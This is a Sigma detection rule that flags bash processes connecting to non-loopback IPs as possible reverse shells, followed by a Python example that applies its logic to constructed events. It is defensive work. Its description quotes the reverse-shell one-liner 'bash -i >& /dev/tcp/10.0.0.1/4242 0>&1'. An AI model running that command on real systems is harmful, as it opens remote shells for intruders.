Linux Reverse Shell Indicator

Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Sigma rule

title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021/10/16
modified: 2022/12/25
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical
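
To show how the rule's selection and filter combine, here is an added Python example (not part of the rule or of the Sigma project) that evaluates the 'selection and not filter' logic over a few constructed network_connection events. Only the Image and DestinationIp field names come from the rule; ProcessId, DestinationPort and every event value are constructed for illustration.

```python
# Added example: applies the detection logic of the rule above to
# constructed Linux network_connection events (not real telemetry).

LOOPBACK_FILTER = {"127.0.0.1", "0.0.0.0"}  # the rule's filter list


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies 'selection and not filter'."""
    image = event.get("Image", "")
    dest_ip = event.get("DestinationIp", "")
    # selection: Image|endswith '/bin/bash' (Sigma string matching is
    # case-insensitive by default, so compare in lower case)
    selection = image.lower().endswith("/bin/bash")
    # filter: DestinationIp is one of the listed local addresses
    filtered = dest_ip in LOOPBACK_FILTER
    return selection and not filtered


def find_hits(events: list) -> list:
    """Return the events the rule would alert on, in input order."""
    return [e for e in events if matches_rule(e)]


# Constructed sample events (constructed values, not real telemetry).
SAMPLE_EVENTS = [
    # The pattern the rule describes: bash opening /dev/tcp to a remote host.
    {"ProcessId": 4242, "Image": "/usr/bin/bash",
     "DestinationIp": "10.0.0.1", "DestinationPort": 4242},
    # bash talking to localhost: excluded by the filter.
    {"ProcessId": 4243, "Image": "/bin/bash",
     "DestinationIp": "127.0.0.1", "DestinationPort": 8080},
    # Wildcard address: excluded by the filter.
    {"ProcessId": 4244, "Image": "/bin/bash",
     "DestinationIp": "0.0.0.0", "DestinationPort": 0},
    # curl to a remote host: not bash, so the selection does not match.
    {"ProcessId": 4245, "Image": "/usr/bin/curl",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    # A bash at another path still ends with '/bin/bash' and matches,
    # which is why the rule uses endswith rather than an exact path.
    {"ProcessId": 4246, "Image": "/usr/local/bin/bash",
     "DestinationIp": "192.0.2.10", "DestinationPort": 53},
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_EVENTS):
        print(f"critical: pid={hit['ProcessId']} {hit['Image']} -> "
              f"{hit['DestinationIp']}:{hit['DestinationPort']}")
```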
